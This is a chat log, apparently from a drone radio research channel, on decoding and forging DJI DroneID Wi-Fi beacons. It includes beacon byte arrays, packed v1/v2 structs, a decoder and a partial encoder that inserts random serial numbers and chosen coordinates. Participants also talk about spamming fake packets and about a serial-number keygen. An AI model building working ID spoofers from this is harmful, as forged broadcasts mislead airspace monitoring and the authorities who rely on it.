[2022-04-21 18:41:24]
dragorn :
Or there's been updates and what we think are legacy V1 packets ARE still V2
[2022-04-21 18:42:00]
dragorn :
kismet has a pile of other drone detection stuff too, but that's almost exclusively just looking at OUIs and SSIDs
[2022-04-21 18:42:10]
dragorn :
nothing elegant at all
[2022-04-21 18:43:01]
dragorn :
there's a yaml file in the config that gets "compiled" down into a kismet config file (because the syntax gets crappy)... but that's just OUI/SSID mapping.
[2022-04-21 18:43:43]
dragorn :
and kismet can do ADSB with a SDR and map advertising devices, but despite there being a slew of DJI drones registered in the global ICAO system, drones aren't supposed to be carrying ADSB transponders.
[2022-04-21 18:47:46]
wavesahead :
@dragorn thank you!! re coordinates, it is very much non trivial to detect bs coordinates because physics boils down to equations, like the haversine formula, so you can pre-calculate a completely valid set of coordinates and then even apply some GIS data to add in elevation.
[2022-04-21 18:48:25]
wavesahead :
around 2015 i made a demo in sweden with APRS, spoofing a ship drawing genitalia over an area in the pacific, just for laughs
[2022-04-21 18:49:19]
wavesahead :
(since aprs has quite a few internet gateways with rf to internet and internet to rf bridging)
[2022-04-21 18:50:51]
dragorn :
It's simpler than you fear
[2022-04-21 18:50:59]
dragorn :
at least, for what I care about re: coordinates
[2022-04-21 18:51:19]
dragorn :
i just haven't done it. between old and new formats, they moved some of the fields, and added an app coordinate field
[2022-04-21 18:51:26]
dragorn :
which overlaps other data in the old field
[2022-04-21 18:51:43]
dragorn :
so i just have to fuzzy detect if the device coordinates are wildly insanely different from the app coordinates
[2022-04-21 18:53:09]
dragorn :
I agree that if you're trying to validate if a given set of coordinates is realistic, that's quite hard; in this case I'm just trying to determine the format of the packet, by validating 2 (or even 3) sets of coordinates to see if the data appears to be coordinate data or not
[2022-04-21 18:53:50]
dragorn :
I believe a full, new-form packet contains the device location, app location, and takeoff location
[2022-04-21 18:54:12]
dragorn :
while an old-form packet contains a device location, some additional pitch/yaw data, and takeoff location
[2022-04-21 18:56:30]
wavesahead :
understood
[2022-04-21 18:56:35]
hostile :
Packet structure with in @wavesahead
[2022-04-21 18:56:42]
wavesahead :
thanks @hostile
[2022-04-21 18:56:50]
wavesahead :
i have a limesdr and a few hackrf boards
[2022-04-21 18:57:08]
wavesahead :
loaned a bladerf for a while but had to ship it back long ago
[2022-04-21 18:57:31]
dragorn :
Fortunately for my purposes in Kismet i don't "have" to validate coordinates - while i'd be happy to include something that tries to identify bogus coordinates, I'm much more centered on providing as close to forensic capture as I can; the new logs and pcapng allow for full retention down to the radiotap capture headers across multiple interfaces, etc.
[2022-04-21 18:57:54]
hostile :
This .diff works with gr-ieee802-11. Still waiting on @icer to stop partying and drop a frequency hopping graph for EnhancedWifi. He got me all activated in here, then disappeared on me ;) (teasing him dearly right now)
[2022-04-21 18:58:12]
wavesahead :
classic icer
[2022-04-21 19:01:31]
dragorn :
it's also on my shortlist to adapt that into a proper kismet input chain from soapy->grieee80211->kismet
[2022-04-21 19:01:44]
dragorn :
but even the short list is pretty far behind right now due to $life_shit
[2022-04-21 19:03:01]
hostile :
This is still cracking me up btw. DJI was so mad about that paper. lol
[2022-04-21 19:09:27]
wavesahead :
they can stock up on baby butt cream
[2022-04-21 19:09:43]
wavesahead :
if their butts are sore
[2022-04-21 19:12:50]
wavesahead :
brb
[2022-04-21 19:37:07]
wavesahead :
where could i get pcaps?
[2022-04-21 19:52:29]
dragorn :
the problem is pcaps by nature contain peoples home locations
[2022-04-21 19:55:39]
wavesahead :
indeed
[2022-04-21 19:56:31]
wavesahead :
if someone wants to sacrifice one, or has one that is not sensitive, i can try to make a small py to sanitize it. lemme see but im pretty sure pcap ng editing is supported.
[2022-04-21 19:58:23]
wavesahead :
https://stackoverflow.com/questions/32250981/pcap-modification-with-python 2015 hah, scapy has changed a bit. ill see. with the offsets kevin provided i should be able to do "position ambiguity"
[2022-04-21 19:58:52]
wavesahead :
https://blog.aprs.fi/2011/01/position-ambiguity-support.html < concept in APRS
[2022-04-21 19:59:14]
wavesahead :
"Ambiguity is configured by setting the number of digits which will be truncated from the end of the position. Plaintext APRS positions are transmitted in degrees and decimal minutes (DD° MM.mm'), with two decimals of minutes. When ambiguity is set to 1, it'll be truncated to DD° MM.m', 2 will transmit DD° mm', 4 will transmit DD° only, resulting in a resolution of 1 degree."
[2022-04-21 19:59:22]
wavesahead :
same can be applied to sanitize coordinates
[2022-04-21 21:05:48]
wavesahead :
anyone using non rpi platforms with NGFF?
[2022-04-21 21:05:59]
wavesahead :
otherwise i think any adapter to usb works for the atheros
[2022-04-21 21:06:35]
hostile :
USB ath9 does not work with 5mhz channel changing
[2022-04-21 21:09:43]
hostile :
btw @here we should make a linux binary to run on rooted DJI drones that just spams fake packets over the atheros. Should be trivial.
[2022-04-21 21:15:44]
wavesahead :
why is that? re usb
[2022-04-21 21:15:58]
wavesahead :
so i need a multi ngff board
[2022-04-21 21:16:07]
wavesahead :
maybe one of those bananapi ones with multiple sockets
[2022-04-21 21:17:38]
hostile :
usb driver / kernel / something has never supported it. Must be an M.2 card
[2022-04-21 21:30:06]
proto :
oooohhhh... derp. that makes a lot of sense. thanks for clearing that up!
[2022-04-21 21:32:35]
proto :
the correlation scores should be normalized which makes it really strange to hear you had to push the correlation score over 1.0 O.o i tried finding a way to install a newer version of octave on my 20.04 machine but ubuntu doesn't seem to like the octave ppa :( i'm curious if there's something goofy happening with the newer version of octave
[2022-04-21 21:36:15]
wavesahead :
surprised, need to look this up. the usb adapter should be ok, the wifi cards are technically connecting as usb devices even if you plug them in the ngff socket
[2022-04-21 21:36:33]
wavesahead :
the adapters are dumb, they have no logic
[2022-04-22 00:56:50]
hostile :
I assume none of these settings have effect on DroneID broadcasting the App location?
[2022-04-22 01:27:35]
wavesahead :
supposedly dji says depending on regulatory obligations they will ignore settings for alwayson
[2022-04-22 01:29:57]
hostile :
setting to CN region does sketchy shit like upload cached logs to a "secret" service
[2022-04-22 01:55:11]
wavesahead :
@dragorn the droneid det in kismet should work with any wifi adapter?
[2022-04-22 01:57:04]
hostile :
no
[2022-04-22 01:57:10]
hostile :
5mhz capable adapter only
[2022-04-22 01:57:14]
hostile :
see channel topic mate
[2022-04-22 01:57:33]
hostile :
m.2 pci ath9k only
[2022-04-22 01:57:41]
hostile :
not "any wifi adapter"
[2022-04-22 01:58:23]
hostile :
Example detail: https://wiki.freebsd.org/dev/ath_hal%284%29/HalfQuarterRate
[2022-04-22 01:59:33]
hostile :
and requires the exact kismet config mentioned above
[2022-04-22 02:00:07]
hostile :
https://twitter.com/d0tslash/status/1509401805913997312?s=20&t=uQjGrrS1XEQpsj5aBMVmfQ
[2022-04-22 02:01:55]
wavesahead :
i need to dig in the parts bin
[2022-04-22 02:02:12]
wavesahead :
it's 4am here dude
[2022-04-22 02:02:17]
wavesahead :
im beginning to skip steps
[2022-04-22 02:02:18]
wavesahead :
;)
[2022-04-22 02:03:45]
hostile :
sleep++
[2022-04-22 02:11:24]
dkovar :
Applying haversine is trivial and you can get the altitude of the launch point from some satellite dataset whose name escapes me. We've done both to make sense of AS data, and to throw out most bad data. After that, you end up comparing various points that are along a track to each other to see if any are physically impossible.
[2022-04-22 02:13:45]
wavesahead :
maybe that was phrased in a confusing way: what I meant was that you can generate nonsense coordinates that are valid and geographically possible (ex. your drone is not hitting the ground while passing a given point), and it is impossible to completely rule a given set of coordinates as fake if you actually craft them properly respecting haversine formula, altitude, random minute variations of speed, etc
[2022-04-22 02:14:26]
dkovar :
Agreed. We've generated synthetic DJI tracks for shits and grins.
[2022-04-22 02:15:10]
wavesahead :
the only complex thing, if you can call it complex, is the altitude and thats also suspect because you can just take the above sea level altitude and apply that, barring geo features like hills and mountains, and even then, as long as you are within max altitude for the drone you spoof, you aren't going to "collide" with anything
[2022-04-22 02:15:55]
wavesahead :
you could even average the heights of those features and decide that you always spoof above X height
[2022-04-22 02:15:57]
wavesahead :
:)
[2022-04-22 02:16:57]
hostile :
Lol I still wanna port my old 3dr code to DUML.
[2022-04-22 02:16:58]
hostile :
https://github.com/MAVProxyUser/3DRSoloHacks/blob/master/vincenty_circle_test.py#L167
[2022-04-22 02:17:24]
hostile :
this used to use the Vincenty direct algo to calculate polygons in the air based on a central GPS point. In this case drawing a dick in the sky
[2022-04-22 02:17:49]
hostile :
Sky peen coords for a field near my home.
[2022-04-22 02:18:45]
hostile :
```
# Vincenty's Direct formulae
def vinc_pt(phi1, lembda1, alpha12, s ) :
```
[2022-04-22 02:18:53]
hostile :
this function is very useful for such fun.
[2022-04-22 02:19:37]
hostile :
combine that with an altitude variation function and you've got a ripe tool for flight path generation.
[2022-04-22 02:20:06]
hostile :
way less sophisticated than what you all described. but it proved a point for a talk I was giving.
[2022-04-22 04:05:39]
wavesahead :
the seq component of the droneid struct in v1 and v2, how is it treated?
[2022-04-22 04:05:48]
wavesahead :
is it incremented on every broadcast?
[2022-04-22 04:10:54]
hostile :
decode the pcap I sent you from my drone
[2022-04-22 04:10:57]
hostile :
it will all make sense
[2022-04-22 04:11:06]
hostile :
[2022-04-22 04:16:33]
hostile :
but to directly answer... yes @wavesahead they do.
[2022-04-22 04:16:34]
hostile :
[2022-04-22 04:16:50]
wavesahead :
ack, thanks for reminding me
[2022-04-22 04:17:05]
hostile :
resent the pcap on signal...
[2022-04-22 04:17:08]
wavesahead :
im adding altitude shifts and state to the little project here.
[2022-04-22 04:17:09]
hostile :
actually sleeping now
[2022-04-22 04:17:11]
wavesahead :
yes i have it
[2022-04-22 04:17:16]
wavesahead :
i should be haha
[2022-04-22 04:18:06]
wavesahead :
is there anything still using v1?
[2022-04-22 04:18:25]
wavesahead :
otherwise i can just limit it to v2 support
[2022-04-22 04:21:00]
wavesahead :
$ python ../../DJIdroneidV2.py ~/Downloads/DJIMiniSE5mhz.pcap
on it, it feels almost as if i was running this on a f* amiga
[2022-04-22 04:41:53]
hostile :
people stay on old firmware. v1 ain't going away
[2022-04-22 04:42:20]
hostile :
Aeroscope supports v1 & v2 packets on its listening interfaces
[2022-04-22 05:10:07]
hostile :
btw this is the historic Intro to AeroScope from Walter Stockwell of DJI. https://www.icao.int/Meetings/UAS2017/Documents/Walter%20Stockwell_Stream%20A.pdf
[2022-04-22 05:10:20]
hostile :
[2022-04-22 05:10:55]
hotelzululima :
asleep hah!
[2022-04-22 05:20:13]
proto :
i have most of a gnuradio OOT module for demodulating drone id. still gotta figure out why equalization fails and add function calls for the FEC, but the guts are there
https://github.com/proto17/dji_droneid/tree/gr-droneid/gnuradio/gr-droneid
[2022-04-22 06:59:13]
wavesahead :
@hostile go to fucking sleep man
[2022-04-22 06:59:38]
wavesahead :
although the fair thing would be that you dont sleep and stay here providing me with pcaps and assorted tidbits
[2022-04-22 07:00:26]
wavesahead :
@proto sweet work
[2022-04-22 07:55:51]
wavesahead :
@dragorn scapy is temperamental
[2022-04-22 13:38:58]
dragorn :
@wavesahead sure - that's why i don't use it. Not sure the context?
[2022-04-22 13:39:10]
dragorn :
@proto awesome
[2022-04-22 16:21:07]
wavesahead :
[2022-04-22 16:21:11]
wavesahead :
@dragorn there
[2022-04-22 16:21:20]
wavesahead :
hold on, will paste the code for the beacon frame
[2022-04-22 16:21:46]
wavesahead :
uint8_t beacon_raw[] = {
0x80, 0x00, // 0-1: Frame Control
0x00, 0x00, // 2-3: Duration
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // 4-9: Destination address (broadcast)
0xba, 0xde, 0xaf, 0xfe, 0x00, 0x06, // 10-15: Source address
0xba, 0xde, 0xaf, 0xfe, 0x00, 0x06, // 16-21: BSSID
0x00, 0x00, // 22-23: Sequence / fragment number
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, // 24-31: Timestamp (GETS OVERWRITTEN TO 0 BY HARDWARE)
0x64, 0x00, // 32-33: Beacon interval
0x00, 0x05, // 34-35: Capability info
0x00, 0x00, /* FILL CONTENT HERE */ // 36-38: SSID parameter set, 0x00:length:content
0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, // 39-48: Supported rates
0x03, 0x01, 0x01, // 49-51: DS Parameter set, current channel 1 (= 0x01),
0x05, 0x04, 0x00, 0x01, 0x00, 0x00, // 52-57: Traffic Indication Map
0x07, 0x06, 0x55, 0x53, 0x00, 0x01, 0x0b, 0x1e, // 58-65: Country information
0x2a, 0x01, 0x00, // 66-68: ERP information
0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, // 69-74: Extended supported rates
0x2d, 0x1a, 0xac, 0x01, 0x02, 0xff, 0xff, 0x00, // 75-103: HT Capabilities
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
// HT Information (NOTE: the length byte 0x16 says 22 bytes follow, but only 21 do here; the later paste of this frame fixes that)
0x3d, 0x16, // 104-105: HT field
/* CHANNEL */ 0x01, // 106: Channel, default to 1
0x01, 0x00, 0x00, // 107-128: HT info (2)
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00,
// IMPROVE: must verify this is truly static across firmware versions and models
0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, // 129-151: RSN Information 22 bytes
0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00,
0x00, 0x0f, 0xac, 0x02, 0x0c, 0x00,
// IMPROVE: must verify this is truly static across firmware versions and models
0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, // 152-178: Vendor Specific:
0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, // Microsoft WMM/WME Parameter Element
0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, // 26 bytes
0x2f, 0x00,
};
[2022-04-22 16:22:00]
wavesahead :
im sending that + droneid v1
[2022-04-22 16:22:14]
hostile :
https://twitter.com/74ck_0/status/1517483406518591490/
[2022-04-22 16:24:57]
wavesahead :
yes, i know the struct... it;s there
[2022-04-22 16:25:14]
wavesahead :
// Packed: the on-air layout has no alignment padding, so the struct must not either
// (without this the compiler pads before the first int32_t and the wire offsets shift)
struct __attribute__((packed)) enhancedwifi_droneid_v1 {
    uint64_t header;        // fixed 8-byte vendor header
    uint8_t sub_cmd;
    uint8_t version;        // 1
    uint16_t seq;           // little endian, incremented on every broadcast
    uint8_t state_info[2];
    uint8_t sn[DJI_WIFI_DRONEID_SN_LENGTH];   // 16 bytes, zero padded if the SN is shorter
    int32_t latitude;
    int32_t longitude;
    int16_t altitude;
    int16_t height;
    int16_t v_north;
    int16_t v_east;
    int16_t v_up;
    int16_t pitch;
    int16_t roll;
    int16_t yaw;
    int16_t latitude_home;
    int16_t longitude_home;
    uint8_t product_type;
    uint8_t uuid_len;
    uint8_t uuid[DJI_WIFI_DRONEID_UUID_LENGTH];
};
[2022-04-22 16:31:37]
wavesahead :
interestingly enough, that crc was missing in the code you sent me but it should not be causing this
[2022-04-22 16:32:04]
wavesahead :
@dragorn i can send you the pcap, do droneid frames decode properly in wireshark?
[2022-04-22 16:32:09]
wavesahead :
perhaps this is normal behavior
[2022-04-22 16:41:28]
wavesahead :
fixed one issue with the frame struct
[2022-04-22 16:44:00]
wavesahead :
{
"seqNum": 40,
"status": "1110101111110000",
"droneID": "",
"longitude": 18.399187431254017,
"latitude": 13.517770357656014,
"absoluteHeight": 0,
"altitude": 0.0,
"north": 654.27,
"east": 654.45,
"down": 2.29,
"yaw": 2.51,
"appGPSTime": 13793055535660.922,
"appGPSLatitude": 580.5133444019231,
"appGPSLongitude": 4825.540699555686,
"homeLongitude": 11752.95062521871,
"homeLatitude": 8093.16116142556,
"productType": "product111",
"uuid": "M"
}
[2022-04-22 16:44:02]
wavesahead :
working
[2022-04-22 16:44:07]
wavesahead :
now i just need to fix up that crap
[2022-04-22 16:56:51]
wavesahead :
@the_lord can you confirm the header in droneid v1 and v2?
[2022-04-22 17:00:34]
proto :
@wavesahead i think that matches well with the decoded RF drone id (not wifi). giving it a good look over now
[2022-04-22 17:07:11]
wavesahead :
possibly the same bit by bit
[2022-04-22 17:07:18]
wavesahead :
it's all little endian btw
[2022-04-22 17:09:11]
proto :
funny timing as i quite literally just looked at the seq number and thought "that's prob byte swapped"
[2022-04-22 17:23:54]
the_lord :
this is V2, but you need to handle the values correctly
[2022-04-22 17:39:50]
wavesahead :
yes, i was crafting v1 packets
[2022-04-22 17:40:09]
wavesahead :
@the_lord do you know what format the sn follows?
[2022-04-22 17:40:33]
wavesahead :
as in, anyone reversed that? to generate valid ones (so as long as they dont check against their cloud)
[2022-04-22 17:41:44]
wavesahead :
global first_line
# var v1000000 float64 = 10000000.0
# var djiConst float64 = 57.2957795785523
# ["SEQ_NUM"] = (2) bytes
# ["STATUS_INFO"] = (2) bytes
# ["AIRCRAFT_SN"] = STRING(16) bytes
# ["CUR_POS_LONGITUDE"] = ((4) bytes / v1000000) * djiConst
# ["CUR_POS_LATITUDE"] = ((4) bytes / v1000000) * djiConst
# ["CUR_GPS_ABS_HEIGHT"] = (2) bytes
# ["CUR_BARO_HEIGHT"] = (2) bytes / 10
# ["VX_NORTH_SPEED"] = (2) bytes / 100
# ["VY_EAST_SPEED"] = (2) bytes / 100
# ["VZ_RISE_SPEED"] = (2) bytes / 100
# ["YAW"] = (2) bytes / v100
# ["APP_GPS_TIMESTAMP"] = (8) bytes
# ["APP_GPS_LATITUDE"] = ((4) bytes / v1000000) * djiConst
# ["APP_GPS_LONGITUDE"] = ((4) bytes / v1000000) * djiConst
# ["HOME_LONGITUDE"] = ((4) bytes / v1000000) * djiConst
# ["HOME_LATITUDE"] = ((4) bytes / v1000000) * djiConst
# ["PRODUCT_TYPE"] = (1) byte
# ["UUID_Length"] = (1) byte
# ["UUID"] = STRING(int(["UUID_Length"]
[2022-04-22 17:42:06]
wavesahead :
d['seqNum'] = unpack_short(data[2:2+2])
d['status'] = reverse(f"{unpack_short(data[4:4+2]):016b}")
d['droneID'] = unpack_string(data[6:6+16])
d['longitude'] = unpack_latlon(data[22:22+4])
d['latitude'] = unpack_latlon(data[26:26+4])
d['absoluteHeight'] = unpack_short(data[30:30+2])
d['altitude'] = unpack_short(data[32:32+2]) / 10
d['north'] = unpack_short(data[34:34+2]) / 100
d['east'] = unpack_short(data[36:36+2]) / 100
d['down'] = unpack_short(data[38:38+2]) / 100
d['yaw'] = unpack_short(data[40:40+2]) / 100
d['appGPSTime'] = unpack_long(data[42:42+8]) / 1000
d['appGPSLatitude'] = unpack_latlon(data[50:50+4])
d['appGPSLongitude'] = unpack_latlon(data[54:54+4])
d['homeLongitude'] = unpack_latlon(data[58:58+4])
d['homeLatitude'] = unpack_latlon(data[62:62+4])
d['productType'] = producttype2name(data[66])
uuid_len = data[67]
[2022-04-22 17:42:10]
wavesahead :
how about the header??
[2022-04-22 17:42:25]
wavesahead :
struct enhancedwifi_droneid_v2 {
uint64_t header;
uint8_t sub_cmd;
uint8_t version;
uint16_t seq;
uint8_t state_info[2];
[2022-04-22 17:45:08]
the_lord :
what do you mean by what format?
[2022-04-22 17:46:03]
the_lord :
appGPSTime should not divide by 1000, it is timestamp in milliseconds
[2022-04-22 17:47:16]
wavesahead :
v1
[2022-04-22 17:47:21]
wavesahead :
if you have the struct def handy
[2022-04-22 17:47:31]
wavesahead :
and for the coords, are they in degrees or radians?
[2022-04-22 17:47:40]
the_lord :
all GPS coordinates in V2 should be divided by 10000000 then multiplied by 57.2957795785523
[2022-04-22 17:51:11]
the_lord :
regarding SN, both V1 and V2 are the same format
old models SN length is 10 characters, newer models 14, Mavic 3 16 character
[2022-04-22 17:51:47]
proto :
can confirm sn on the dji mini 2 is 14 bytes
[2022-04-22 18:04:21]
wavesahead :
// Packed: the on-air layout has no alignment padding, so the struct must not either
// (without this the compiler pads before longitude and before app_gps_time)
struct __attribute__((packed)) enhancedwifi_droneid_v2 {
    uint64_t header;            // fixed 8-byte vendor header (dji_droneinfo_hdr)
    uint8_t sub_cmd;
    uint8_t version;            // 2
    uint16_t seq;               // little endian, incremented on every broadcast
    uint8_t state_info[2];
    uint8_t sn[DJI_WIFI_DRONEID_SN_LENGTH];   // always 16 bytes, zero padded if the SN is shorter
    int32_t longitude;          // degrees = raw / 10000000 * 57.2957795785523
    int32_t latitude;           // same scaling
    int16_t absolute_height;
    int16_t altitude;           // decoded as raw / 10
    int16_t vx_north_speed;     // raw / 100
    int16_t vy_east_speed;      // raw / 100
    int16_t vz_rise_speed;      // raw / 100
    int16_t yaw;                // raw / 100
    uint64_t app_gps_time;      // timestamp in milliseconds (no further scaling)
    int32_t app_gps_latitude;   // same scaling as longitude/latitude
    int32_t app_gps_longitude;
    int32_t home_longitude;
    int32_t home_latitude;
    uint8_t product_type;
    uint8_t uuid_len;
    uint8_t uuid[DJI_WIFI_DRONEID_UUID_LENGTH];
};
[2022-04-22 18:04:33]
wavesahead :
#define DJI_WIFI_DRONEID_SN_LENGTH 16
#define DJI_WIFI_DRONEID_UUID_LENGTH 20
[2022-04-22 18:04:47]
wavesahead :
// Bytes: DD 52 26 37 12 58 62 13 (0xDD = vendor-specific element ID 221, then the IE length byte, then the OUI 26:37:12)
const unsigned char *dji_droneinfo_hdr = (unsigned char *) "\xDDR&7\x12Xb\x13";
[2022-04-22 18:05:13]
wavesahead :
{
"seqNum": 499,
"status": "1110101111110000",
"droneID": "",
"longitude": 13.517770357656014,
"latitude": 18.399187431254017,
"absoluteHeight": 0,
"altitude": 6538.5,
"north": 0.0,
"east": 653.57,
"down": 653.2,
"yaw": 653.48,
"appGPSTime": 0.007,
"appGPSLatitude": 0.0,
"appGPSLongitude": 18.399187431254017,
"homeLongitude": 13.517770357656014,
"homeLatitude": 13.517770357656014,
"productType": "product0",
"uuid": ""
}
[2022-04-22 18:05:16]
wavesahead :
not decoding properly
[2022-04-22 18:05:26]
wavesahead :
seqnum is right
[2022-04-22 18:05:32]
wavesahead :
status is nonsense
[2022-04-22 18:05:55]
wavesahead :
b9ae33caf9f23a7196764720b0d9dc6fc5ca5dd0e4dbce1f832abf0ae10e59be ../DJIdroneidV2.py
[2022-04-22 18:06:30]
proto :
thank you very much for showing the protocol! i'm walking through an outdoor collect of the rf drone id now
[2022-04-22 18:06:52]
wavesahead :
still working out some quirks
[2022-04-22 18:09:44]
proto :
i think in the mini 2 the sn is 16 bytes, but only 14 are used. the last two are zeros, then a valid lon and lat
[2022-04-22 18:10:40]
the_lord :
SN field is always 16 bytes, if the actual SN was 14 you need to add zero padding to it
[2022-04-22 18:12:11]
wavesahead :
I'm digging for the SN format (if someone reversed a keygen even better)
[2022-04-22 18:15:05]
wavesahead :
{
"seqNum": 270,
"status": "1110101111110000",
"droneID": "2387DA7E3E7717H",
"longitude": 0.0,
"latitude": 0.0,
"absoluteHeight": 0,
"altitude": 6541.5,
"north": 0.0,
"east": 1.2,
"down": 654.11,
"yaw": 1.69,
"appGPSTime": 0.007,
"appGPSLatitude": 0.0,
"appGPSLongitude": 0.0,
"homeLongitude": 0.0,
"homeLatitude": 0.0,
"productType": "product0",
"uuid": ""
}
[2022-04-22 18:15:07]
wavesahead :
a bit better
[2022-04-22 18:16:58]
proto :
works out well for me. i think the diff is that there is no 64-bit header. i have a length identifier in the first byte that covers the entire frame. i also have a CRC16 at the end. with a zero byte that is maybe for CRC24 capability?
[2022-04-22 18:31:35]
faineg :
i am VERY interested in those questions too. i can also tell you 110% that the international humanitarian aid community uses DJI drones globally, increasingly in dangerous conflict zones....
[2022-04-22 18:31:46]
proto :
is there anything like an aeroscope simulator? would like to try tx'ing some frames but don't have anything to know if it's valid other than just demod'ing what i tx
[2022-04-22 18:33:15]
proto :
also, does anyone have an application that can generate what appears to be valid flight info? i saw earlier that ppl were talking about algos that can produce something that looks valid, but nothing about someone having a tool that we can use to help populate all the required fields in the drone id frame
[2022-04-22 18:37:12]
faineg :
hmm, thanks for sharing
[2022-04-22 18:38:37]
faineg :
many examples of recent DJI use in the spreadsheet I'm maintaining https://docs.google.com/spreadsheets/d/1NtgseODXGSAomx6G5Efwz4XY6AuYF9ZjGSGiCxvNHXE/edit?usp=sharing
[2022-04-22 18:38:47]
faineg :
the Kadyrovites really are wild about them
[2022-04-22 18:39:28]
faineg :
yup
[2022-04-22 19:18:38]
hostile :
anyone here know if the NexMon BCM4339 framework can allow us to tune to 5mhz channels and recieve / generate 802.11 beacons? https://twitter.com/nexmon_dev/status/984544978537009152
[2022-04-22 19:19:08]
hostile :
hrmm ```
the directory payload_generation contains the MATLAB script generate_frame.m that generates a Wi-Fi beacon frame with SSID MyCovertChannel.
```
[2022-04-22 19:19:46]
hostile :
https://github.com/seemoo-lab/mobisys2018_nexmon_software_defined_radio/blob/master/payload_generation/generate_frame.m
[2022-04-22 19:21:48]
hostile :
@wavesahead ... may be another alternative to ESP32.
[2022-04-22 19:22:43]
hostile :
lol that is ugly https://github.com/seemoo-lab/mobisys2018_nexmon_software_defined_radio/blob/master/payload_generation/myframe.sh
[2022-04-22 19:24:26]
hostile :
Looks like it would need a 1/4 rate added to it's set_rate() function eh? https://github.com/seemoo-lab/mobisys2018_nexmon_software_defined_radio/blob/master/payload_generation/ieee_80211_encoder.m#L105
[2022-04-22 19:26:54]
dragorn :
There is no 'droneid frame' in wifi - it's an IE 221 custom vendor tag in some beacons. No, wireshark doesn't currently decode them.
[2022-04-22 19:28:29]
dragorn :
Adding decode for that tag to wireshark is on my list, but, many things are on that list
[2022-04-22 19:32:34]
atlantic :
the length byte at the beginning and the CRC16 at the end are only in OcuSync. They are not in the wifi beacon.
[2022-04-22 20:20:50]
wavesahead :
@dragorn
[2022-04-22 20:22:54]
dragorn :
It's one of the 221 tags, yes. Looks like your capture is otherwise somewhat corrupted - maybe missing FCS when it thinks it needs it, maybe including FCS when rtap says it isn't there
[2022-04-22 20:24:18]
wavesahead :
lemme see, it might be something i did
[2022-04-22 20:25:23]
wavesahead :
uint8_t beacon_raw[] = {
0x80, 0x00, // 0-1: Frame Control
0x00, 0x00, // 2-3: Duration
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // 4-9: Destination address (broadcast)
0xba, 0xde, 0xaf, 0xfe, 0x00, 0x06, // 10-15: Source address
0xba, 0xde, 0xaf, 0xfe, 0x00, 0x06, // 16-21: BSSID
0x00, 0x00, // 22-23: Sequence / fragment number
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, // 24-31: Timestamp (GETS OVERWRITTEN TO 0 BY HARDWARE)
0x64, 0x00, // 32-33: Beacon interval
0x00, 0x05, // 34-35: Capability info
0x00, 0x00, /* FILL CONTENT HERE */ // 36-38: SSID parameter set, 0x00:length:content
0x01, 0x08, 0x82, 0x84, 0x8b, 0x0c, 0x12, 0x96, // supported rates
0x18, 0x24,
0x03, 0x01, 0x0b, // current channel
0x05, 0x04, 0x00, 0x01, 0x00, 0x00, // traffic indication map
0x07, 0x06, 0x55, 0x53, 0x00, 0x01, 0x0b, 0x1e, // country information
0x2a, 0x01, 0x00, // erp information
0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, // extended supported rates
0x2d, 0x1a, 0xac, 0x01, 0x02, 0xff, 0xff, 0x00, // HT Capabilities
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x3d, 0x16, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, // HT Information
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, // RSN Information
0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00,
0x00, 0x0f, 0xac, 0x02, 0x0c, 0x00,
0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, // Vendor Specific: Microsoft WMM/WME Parameter Element
0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4,
0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32,
0x2f, 0x00,
};
[2022-04-22 20:35:03]
wavesahead :
void dji_init_droneinfo_v2(struct enhancedwifi_droneid_v2 *droneinfo, drone_state_t *ds)
{
    // Encoder side is the inverse of the decoder's (raw / 10000000) * 57.2957795785523,
    // i.e. raw = degrees / 57.2957795785523 * 10000000. Dividing by 10000000 first
    // (as the original did) truncates every real-world coordinate to 0.
    const double deg2raw = 10000000.0 / 57.2957795785523;

    memset(droneinfo, 0, sizeof(struct enhancedwifi_droneid_v2));
    memcpy(&droneinfo->header, dji_droneinfo_hdr, sizeof(droneinfo->header));
    droneinfo->sub_cmd = 0x10;
    droneinfo->version = 2;
    droneinfo->state_info[0] = 0xD7;
    droneinfo->state_info[1] = 0x0F;
    // 14-char SN; the field is 16 bytes, the memset above supplies the zero padding
    rand_buf_wcharset((char *) &droneinfo->sn, 14, "ABCDEFGH0123456789", true);
    droneinfo->latitude = (int32_t) (ds->current_latitude * deg2raw);
    droneinfo->longitude = (int32_t) (ds->current_longitude * deg2raw);
    droneinfo->altitude = (int16_t) (ds->current_altitude);   // decoder divides by 10
    droneinfo->absolute_height = 66;
    droneinfo->vx_north_speed = 40;   // decoder divides speeds and yaw by 100
    droneinfo->vy_east_speed = 41;
    droneinfo->vz_rise_speed = 42;
    droneinfo->yaw = 7;
    droneinfo->home_latitude = (int32_t) (ds->home_latitude * deg2raw);
    droneinfo->home_longitude = (int32_t) (ds->home_longitude * deg2raw);
